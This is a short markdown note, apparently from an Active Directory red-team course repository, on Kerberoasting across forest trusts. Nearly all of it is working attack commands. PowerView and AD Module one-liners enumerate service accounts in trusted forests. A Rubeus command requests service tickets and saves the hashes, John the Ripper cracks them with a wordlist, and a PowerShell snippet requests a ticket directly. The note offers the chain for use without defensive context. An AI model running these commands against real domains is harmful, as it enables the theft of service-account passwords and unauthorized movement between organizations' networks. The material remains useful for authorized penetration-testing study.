Skip to content

Latest commit

 

History

History
61 lines (37 loc) · 1.16 KB

n18-ForestKerberoast.md

File metadata and controls

61 lines (37 loc) · 1.16 KB

Cross Forest Attack - Kerberoast



Cross Forest Kerberoasting

It is possible to execute Kerberoast across Forest trusts.

To enumerate named service accounts across forest trusts:

  • PowerView
Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName}
  • AD Module
Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -Server $_.Name}

To request a TGS:

C:\AD\Tools\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:euhashes.txt

To check for the TGS:

klist

To crack the password used to encrypt the TGS:

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

Request TGS across trust using PowerShell:

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList MSSQLSvc/[email protected]